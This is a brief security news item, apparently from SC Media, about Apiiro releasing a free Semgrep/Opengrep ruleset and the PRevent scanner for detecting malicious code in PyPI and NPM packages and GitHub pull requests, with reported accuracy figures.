BleepingComputer reports that Apiiro, an application security posture management firm, has unveiled a pair of open-source tools aimed at combating malicious code injections and software supply chain intrusions.First of the free tools is a comprehensive Semgrep and Opengrep ruleset that could be used in continuous integration and continuous deployment pipelines, which has yielded 94.3% and 88.4% accuracy in identifying nefarious code in PyPI and NPM packages, respectively. On the other hand, the GitHub-integrated scanner PRevent yielded 91.5% accuracy in determining malicious pull requests. Both tools, which could be downloaded for free on GitHub, were touted by Apiiro to flag malicious code using "anti-patterns," including encoding, nested transformation, and other obfuscation techniques; the utilization of functions permitting arbitrary code execution; the presence of code enabling remote payload download and execution; and methods for sensitive user data theft. Despite lacking compiled binary-hidden malware discovery and direct PyPI and NPM package scanning capabilities, both tools are poised to be updated with AI-assisted scanning and deep code analysis features in the future, according to Apiiro.
Related Events
Get daily email updates
SC Media's daily must-read of the most current and pressing daily news
You can skip this ad in 5 seconds





